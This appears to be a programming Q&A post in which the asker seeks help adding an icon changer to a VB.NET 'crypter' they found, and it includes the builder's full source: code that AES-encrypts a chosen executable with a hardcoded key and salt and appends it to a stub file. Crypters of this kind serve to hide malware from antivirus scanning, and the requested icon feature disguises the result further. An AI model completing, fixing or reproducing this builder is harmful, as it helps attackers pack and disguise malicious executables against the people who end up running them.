# Visual Basic: 'IconInjector' cannot be declared in vb

Tags: vb.net

Hi I am trying to edit a crypter I found by adding stuff to it what I am trying to do is add a icon changer.  Whats wrong is it gives me and error. the part with the 2 *'s by it is the error. Also I am not sure If I have the right way to find the exe file to change either. I am trying to crypt the file thats being crypted. So I put: Application.StartupPath + "\Stub.exe", FlatTextBox2.Text) the application.StartUpPath thing for the files thats being crypted and flattextbox2.text for the location of the icon path is that right if not could you possibly help me with that too?

```
Imports System.Security.Cryptography
Imports System.IO
Public Class Form1
    Dim Hijackthis, Jack As String

    Private Sub FlatButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FlatButton2.Click
        With OpenFileDialog1
            .FileName = ""
            .Filter = "Executable(*.exe)|*.exe"
            .Title = "Zappy Crypter"
            .ShowDialog()
            FlatTextBox1.Text = .FileName
            Hijackthis = FlatTextBox1.Text
        End With
    End Sub

    Private Sub FlatButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FlatButton1.Click
        Dim key As String = "54321"
        Dim Splitt As String = "54321"
        Dim Cryptfile As String
        FileOpen(1, Application.StartupPath + "\Thing.exe", OpenMode.Binary)
        Jack = Space(LOF(1))
        FileGet(1, Jack)
        FileClose(1)
        FileOpen(1, (FlatTextBox1.Text), OpenMode.Binary)
        Hijackthis = Space(LOF(1))
        FileGet(1, Hijackthis)
        FileClose(1)
        Cryptfile = Hijackthis
        Dim oAesProvider As New RijndaelManaged
        Dim btClear() As Byte

        Dim btSalt() As Byte = New Byte() {12, 23, 34, 45, 56, 67, 78, 89}

        Dim oKeyGenerator As New Rfc2898DeriveBytes(key, btSalt)

        oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
        oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

        Dim ms As New IO.MemoryStream
        Dim cs As New CryptoStream(ms, _
          oAesProvider.CreateEncryptor(), _
          CryptoStreamMode.Write)
        btClear = System.Text.Encoding.UTF8.GetBytes(Cryptfile)
        cs.Write(btClear, 0, btClear.Length)
        cs.Close()
        Cryptfile = Convert.ToBase64String(ms.ToArray)
        FileOpen(1, Application.StartupPath + "\Stub.exe", OpenMode.Binary)
        FilePut(1, Jack)
        FilePut(1, Splitt)
        FilePut(1, Cryptfile)
        FilePut(1, Splitt)
        FileClose(1)
        MsgBox("Crypting Now!")
        MsgBox("File Crypted Succesfully", MsgBoxStyle.Information, "Success")

        If FlatTextBox2.Text = "" Then
            MsgBox("Please Pick A Icon Format File", MsgBoxStyle.Critical, "Error Changing The Icon")
        End If

        If FlatTextBox2.Text = "" Then Exit Sub

        **IconInjector**.InjectIcon(Application.StartupPath + "\Stub.exe", FlatTextBox2.Text)
        MsgBox("Icon Changed Successfully!", MsgBoxStyle.Information, "Success")
    End Sub

    Private Sub FlatButton3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles FlatButton3.Click
        OpenFileDialog1.DefaultExt = "ico"
        OpenFileDialog1.Filter = "icon files (*.ico)|*.ico"
        OpenFileDialog1.FilterIndex = 1
        If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then
            FlatTextBox2.Text = String.Empty
            FlatTextBox2.Text = OpenFileDialog1.FileName
        End If
    End Sub
End Class
```

Comment: Please add the complete error message to your question

Comment: Have you added a reference to the assembly that contains the `IconInjector` class?  Have you added the appropriate `Imports` statements at the top of your code?

Comment: Please help me with this python problem.

Comment: Please don't edit a previous question into a completely new one. If you have a different question, [ask a different question.](http://stackoverflow.com/questions/ask)